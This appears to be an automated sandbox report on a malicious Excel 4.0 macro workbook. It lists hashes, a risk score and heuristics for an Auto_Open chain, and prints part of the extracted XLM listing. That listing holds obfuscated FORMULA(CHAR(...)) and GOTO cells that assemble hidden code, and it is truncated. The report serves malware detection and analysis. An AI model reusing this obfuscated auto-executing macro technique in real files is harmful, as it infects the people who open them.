Office (OLE) malware analysis — malicious · 3cdf970a5727637d

MALICIOUS

Office (OLE)

291.0 KB Created: 2020-05-15 13:56:06 Authoring application: Microsoft Excel First seen: 2020-09-07

MD5: 21e35c1a43873347a04f767c5bec50f2 SHA-1: f8f42c52a01cc97a0fc55cdbaadd182748e3a609 SHA-256: 3cdf970a5727637df07b08b5738e64226537c4e823980d00a71d14a70092a0be

140 Risk Score

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 125908 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	125908 bytes
SHA-256: `c4b7dc6fdab1d9ed6b3a2cfa57f94d25cea33d7369b33b2d82c1924735d266b9`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!JM33344 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,IY14,"",-175.00000000000000000000 ' Sheet,ED35,"",-0.32075471698113205976 ' Sheet,BV88,"",0.57342657342657343822 ' Sheet,GB187,"",-1450.50000000000000000000 ' Sheet,JL216,"",-806.19999999999993178790 ' Sheet,JJ224,"",-6.93333333333333357018 ' Sheet,GM241,"",-5.04395604395604379988 ' Sheet,BI282,"",-1.57971014492753614178 ' Sheet,DZ283,"",986.00000000000000000000 ' Sheet,EQ309,"FORMULA(CHAR(FJ63093/FA14241)&CHAR(BP26426/CT26388)&CHAR(EY14843J8074)&CHAR(BP26426JI27770)&CHAR(CW32138/HN42509)&CHAR(FJ63093-CI61944)&CHAR(EY14843/GT13615)&CHAR(BV12533+EY4528)&CHAR(FP31020-GA50428)&CHAR(IH52841/FF19414)&CHAR(Z30607/JU58901)&CHAR(FP31020+JE22818)&CHAR(G44366/IV17488)&CHAR(EY14843+DG55716)&CHAR(EY14843+IW62807)&CHAR(CW32138/JL43588)&CHAR(Z30607-FW55334)&CHAR(FP31020/DV51842)&CHAR(EY14843/BL41946)&CHAR(FP31020-GF41715)&CHAR(BV12533+IC31398)&CHAR(DR15754FD42568)&CHAR(EY14843CY53929)&CHAR(CW32138-GQ58315)&CHAR(G44366/DN64568)&CHAR(G44366/BC45989)&CHAR(BV12533+BA16082)&CHAR(BV12533/EL17983)&CHAR(EY14843BB2953)&CHAR(BV12533-GY7326)&CHAR(BP26426+GE21104)&CHAR(FJ63093/DQ21623)&CHAR(DR15754-DA28284)&CHAR(G44366+IG58158)&CHAR(BV12533-JJ23789)&CHAR(EY14843-HX47850)&CHAR(FP31020JF38416)&CHAR(FP31020/DV26321)&CHAR(DR15754-CA1017)&CHAR(G44366/FY37435)&CHAR(IH52841GZ22877)&CHAR(DR15754FO2976)&CHAR(FP31020/GL4832)&CHAR(EY14843/CQ56094),EQ310)","" ' Sheet,EQ311,GOTO(IA56639),"" ' Sheet,HH462,"",-15.16666666666666607455 ' Sheet,IK475,"",627.00000000000000000000 ' Sheet,EW520,"",-70.00000000000000000000 ' Sheet,EY545,"",-0.17409766454352440523 ' Sheet,GA556,"",197.00000000000000000000 ' Sheet,JN572,"",-0.14423176923076921896 ' Sheet,EP597,"",-0.09842009842009842580 ' Sheet,JA638,"",-620.00000000000000000000 ' Sheet,R688,"",-5.02197802197802189994 ' Sheet,CG703,"",-0.10722100656455142709 ' Sheet,IV813,"FORMULA(CHAR(IH52841-GS36306)&CHAR(DR15754FV18477)&CHAR(IH52841-CN63305)&CHAR(DR15754BE36222)&CHAR(G44366+DH2667)&CHAR(IH52841/M24403)&CHAR(G44366/ES40558)&CHAR(CW32138/X48895)&CHAR(DR15754/V61590)&CHAR(CW32138/FF42781)&CHAR(FJ63093-O6268)&CHAR(Z30607/IZ11530)&CHAR(BP26426/EM38608)&CHAR(BV12533FH12084)&CHAR(EY14843CZ47542)&CHAR(IH52841/EI51212)&CHAR(Z30607EE2952)&CHAR(DR15754+FA13553)&CHAR(BV12533/HY42518)&CHAR(DR15754DJ2375)&CHAR(DR15754DB38229)&CHAR(BP26426EM20567)&CHAR(FP31020-IM7824)&CHAR(IH52841HR46703)&CHAR(DR15754+EG49719)&CHAR(EY14843/F58737),IV814)","" ' Sheet,IV815,GOTO(GJ37129),"" ' Sheet,EW834,"",-0.18161925601750547599 ' Sheet,DL836,"",4.06666666666666642982 ' Sheet,BX980,"",350.00000000000000000000 ' Sheet,EN999,"",-0.09065009065009066447 ' Sheet,CA1017,"",-822.19999999999993178790 ' Sheet,JL1048,"",0.27972027972027974085 ' Sheet,JO1059,"",-0.81889763779527557919 ' Sheet,DE1070,"FORMULA(CHAR(BP26426/CF19759)&CHAR(DR15754/HB18750)&CHAR(Z30607+HB64709)&CHAR(CW32138H51287)&CHAR(CW32138EL32092)&CHAR(Z30607/ED1942)&CHAR(IH52841+JF52023)&CHAR(FJ63093+DP51846)&CHAR(CW32138-BB10633)&CHAR(DR15754+DQ58756)&CHAR(FP31020+GJ59144)&CHAR(Z30607/JQ54032)&CHAR(BV12533HG38502)&CHAR(IH52841IN59269)&CHAR(Z30607+BL45506)&CHAR(Z30607-FU23281)&CHAR(BP26426BO15485)&CHAR(FP31020HE50596)&CHAR(FP31020/FA32220)&CHAR(CW32138+BF47529)&CHAR(BV12533X38342)&CHAR(G44366IQ47916)&CHAR(G44366/GN41548)&CHAR(IH52841+EI34275)&CHAR(BV12533+IS1302)&CHAR(FP31020+Y4561)&CHAR(FJ63093-HX48189)&CHAR(DR15754GM53724),DO3209)","" ' Sheet,DE1071,GOTO(GM5369),"" ' Sheet,HX1083,"",370.00000000000000000000 ' Sheet,FF1141,"",-454.00000000000000000000 ' Sheet,GO1153,"",535.00000000000000000000 ' Sheet,IS1302,"",587.00000000000000000000 ' Shee ... (truncated)

SHA-256: c4b7dc6fdab1d9ed6b3a2cfa57f94d25cea33d7369b33b2d82c1924735d266b9

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!JM33344 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,IY14,"",-175.00000000000000000000
'  Sheet,ED35,"",-0.32075471698113205976
'  Sheet,BV88,"",0.57342657342657343822
'  Sheet,GB187,"",-1450.50000000000000000000
'  Sheet,JL216,"",-806.19999999999993178790
'  Sheet,JJ224,"",-6.93333333333333357018
'  Sheet,GM241,"",-5.04395604395604379988
'  Sheet,BI282,"",-1.57971014492753614178
'  Sheet,DZ283,"",986.00000000000000000000
'  Sheet,EQ309,"FORMULA(CHAR(FJ63093/FA14241)&CHAR(BP26426/CT26388)&CHAR(EY14843*J8074)&CHAR(BP26426*JI27770)&CHAR(CW32138/HN42509)&CHAR(FJ63093-CI61944)&CHAR(EY14843/GT13615)&CHAR(BV12533+EY4528)&CHAR(FP31020-GA50428)&CHAR(IH52841/FF19414)&CHAR(Z30607/JU58901)&CHAR(FP31020+JE22818)&CHAR(G44366/IV17488)&CHAR(EY14843+DG55716)&CHAR(EY14843+IW62807)&CHAR(CW32138/JL43588)&CHAR(Z30607-FW55334)&CHAR(FP31020/DV51842)&CHAR(EY14843/BL41946)&CHAR(FP31020-GF41715)&CHAR(BV12533+IC31398)&CHAR(DR15754*FD42568)&CHAR(EY14843*CY53929)&CHAR(CW32138-GQ58315)&CHAR(G44366/DN64568)&CHAR(G44366/BC45989)&CHAR(BV12533+BA16082)&CHAR(BV12533/EL17983)&CHAR(EY14843*BB2953)&CHAR(BV12533-GY7326)&CHAR(BP26426+GE21104)&CHAR(FJ63093/DQ21623)&CHAR(DR15754-DA28284)&CHAR(G44366+IG58158)&CHAR(BV12533-JJ23789)&CHAR(EY14843-HX47850)&CHAR(FP31020*JF38416)&CHAR(FP31020/DV26321)&CHAR(DR15754-CA1017)&CHAR(G44366/FY37435)&CHAR(IH52841*GZ22877)&CHAR(DR15754*FO2976)&CHAR(FP31020/GL4832)&CHAR(EY14843/CQ56094),EQ310)",""
'  Sheet,EQ311,GOTO(IA56639),""
'  Sheet,HH462,"",-15.16666666666666607455
'  Sheet,IK475,"",627.00000000000000000000
'  Sheet,EW520,"",-70.00000000000000000000
'  Sheet,EY545,"",-0.17409766454352440523
'  Sheet,GA556,"",197.00000000000000000000
'  Sheet,JN572,"",-0.14423176923076921896
'  Sheet,EP597,"",-0.09842009842009842580
'  Sheet,JA638,"",-620.00000000000000000000
'  Sheet,R688,"",-5.02197802197802189994
'  Sheet,CG703,"",-0.10722100656455142709
'  Sheet,IV813,"FORMULA(CHAR(IH52841-GS36306)&CHAR(DR15754*FV18477)&CHAR(IH52841-CN63305)&CHAR(DR15754*BE36222)&CHAR(G44366+DH2667)&CHAR(IH52841/M24403)&CHAR(G44366/ES40558)&CHAR(CW32138/X48895)&CHAR(DR15754/V61590)&CHAR(CW32138/FF42781)&CHAR(FJ63093-O6268)&CHAR(Z30607/IZ11530)&CHAR(BP26426/EM38608)&CHAR(BV12533*FH12084)&CHAR(EY14843*CZ47542)&CHAR(IH52841/EI51212)&CHAR(Z30607*EE2952)&CHAR(DR15754+FA13553)&CHAR(BV12533/HY42518)&CHAR(DR15754*DJ2375)&CHAR(DR15754*DB38229)&CHAR(BP26426*EM20567)&CHAR(FP31020-IM7824)&CHAR(IH52841*HR46703)&CHAR(DR15754+EG49719)&CHAR(EY14843/F58737),IV814)",""
'  Sheet,IV815,GOTO(GJ37129),""
'  Sheet,EW834,"",-0.18161925601750547599
'  Sheet,DL836,"",4.06666666666666642982
'  Sheet,BX980,"",350.00000000000000000000
'  Sheet,EN999,"",-0.09065009065009066447
'  Sheet,CA1017,"",-822.19999999999993178790
'  Sheet,JL1048,"",0.27972027972027974085
'  Sheet,JO1059,"",-0.81889763779527557919
'  Sheet,DE1070,"FORMULA(CHAR(BP26426/CF19759)&CHAR(DR15754/HB18750)&CHAR(Z30607+HB64709)&CHAR(CW32138*H51287)&CHAR(CW32138*EL32092)&CHAR(Z30607/ED1942)&CHAR(IH52841+JF52023)&CHAR(FJ63093+DP51846)&CHAR(CW32138-BB10633)&CHAR(DR15754+DQ58756)&CHAR(FP31020+GJ59144)&CHAR(Z30607/JQ54032)&CHAR(BV12533*HG38502)&CHAR(IH52841*IN59269)&CHAR(Z30607+BL45506)&CHAR(Z30607-FU23281)&CHAR(BP26426*BO15485)&CHAR(FP31020*HE50596)&CHAR(FP31020/FA32220)&CHAR(CW32138+BF47529)&CHAR(BV12533*X38342)&CHAR(G44366*IQ47916)&CHAR(G44366/GN41548)&CHAR(IH52841+EI34275)&CHAR(BV12533+IS1302)&CHAR(FP31020+Y4561)&CHAR(FJ63093-HX48189)&CHAR(DR15754*GM53724),DO3209)",""
'  Sheet,DE1071,GOTO(GM5369),""
'  Sheet,HX1083,"",370.00000000000000000000
'  Sheet,FF1141,"",-454.00000000000000000000
'  Sheet,GO1153,"",535.00000000000000000000
'  Sheet,IS1302,"",587.00000000000000000000
'  Shee
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.